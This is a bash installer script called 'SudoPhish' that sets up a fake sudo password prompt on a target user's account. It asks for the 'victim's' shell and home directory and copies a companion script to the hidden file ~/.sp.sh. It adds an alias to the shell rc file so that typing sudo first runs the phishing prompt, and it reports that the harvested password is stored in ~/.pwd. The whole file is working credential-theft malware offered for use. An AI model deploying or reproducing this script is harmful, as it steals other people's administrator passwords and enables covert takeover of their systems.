wizard.sh (1309B)
1 #!/bin/bash 2 3 echo "SudoPhish" 4 echo "By Michael C. Dim." 5 echo "mk@mcdim.xyz" 6 echo "" 7 sleep 1 8 echo " --= Wizard =--" 9 sleep 1 10 echo "Make sure the sp.sh file is in the same directory as the wizard." 11 sleep 1 12 echo "The sp.sh file must be unmodified." 13 sleep 1 14 echo "" 15 echo -n "A) What is the victim's interactive Shell (bash/zsh)? " 16 read shell 17 echo -n "B) Type the full (absolute) path to the victim's home directory (i.e /home/peter): " 18 read homedir 19 echo -n "C) Does the victim need to type a password for sudo? (yes if unsure) [y/n] " 20 read reply 21 #echo "D) Once the password is harvested, it will be saved in a file. What do you want that filename/path to be? " 22 #read filename 23 echo "" 24 25 # Set the shell 26 echo "$shell" 27 shell_sub() { 28 cp sp.sh sp.sh.tmp1 29 sed "s/bash/$shell/g" sp.sh.tmp1 > sp.sh 30 shred -fu sp.sh.tmp1 31 } 32 33 shell_sub 34 35 36 # Hide wrong password error 37 38 commentit() { 39 cp sp.sh sp.sh.tmp2 40 sed '28 s/./#&/' sp.sh.tmp2 > sp.sh 41 shred -fu sp.sh.tmp2 42 } 43 44 [ $reply = "n" -o $reply = "N" ] && commentit 45 46 47 # Filename 48 49 # filename() { 50 # cp sp.sh sp.sh.tmp3 51 # sed "s/.pwd/$filename/g" sp.sh.tmp3 > sp.sh 52 # shred -fu sp.sh.tmp3 53 #} 54 55 chmod +x sp.sh 56 mv sp.sh "$homedir"/.sp.sh 57 58 echo "alias sudo=\"~/.sp.sh; sudo\"" >> ."$shell"rc 59 60 echo "The script has been deployed. The password will be saved in ~/.pwd" 61 echo "Now, wait"